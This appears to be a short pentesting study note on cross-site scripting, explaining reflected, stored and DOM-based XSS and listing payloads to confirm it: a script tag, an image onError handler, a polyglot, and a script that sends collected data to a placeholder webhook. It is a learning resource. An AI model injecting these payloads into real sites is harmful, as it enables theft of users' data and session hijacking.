XSS

There are three different types of cross-site scripting

Reflected
Stored
DOM-based

There are many options to confirm XSS:

// Embed a script tag
<script>prompt(1);</script>

// Use an error state of an image
<img src="x" onError="prompt(1);" />

// Test HTML injection to be a but more subtle
<h1>testing</h1>

// For a stored XSS, we can use javascript to create an image
<script>var i = new Image;i.src="[webhook/webserver]?[info to exfiltrate]";</script>

// Polyglot to test many options:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e

Reflected

The script you are trying to inject comes from the current request. Somewhat limiting

Stored

Payload is stored in something like a databased, impact is much higher

DOM-Based

Client side has vulnerable JS that uses untrusted input instead of having a vuln server-side

This can be seen when you're able to see input data populated on the site, but there are no network requests, meaning this data is loaded specifically in the DOM.

Cheat Sheet

XSS Filter Evasion - OWASP Cheat Sheet Seriescheatsheetseries.owasp.org

PreviousSQL Injection NextCommand Injection

Last updated 24 days ago

hashtagReflected

hashtagStored

hashtagDOM-Based

hashtagCheat Sheet

Reflected

Stored

DOM-Based

Cheat Sheet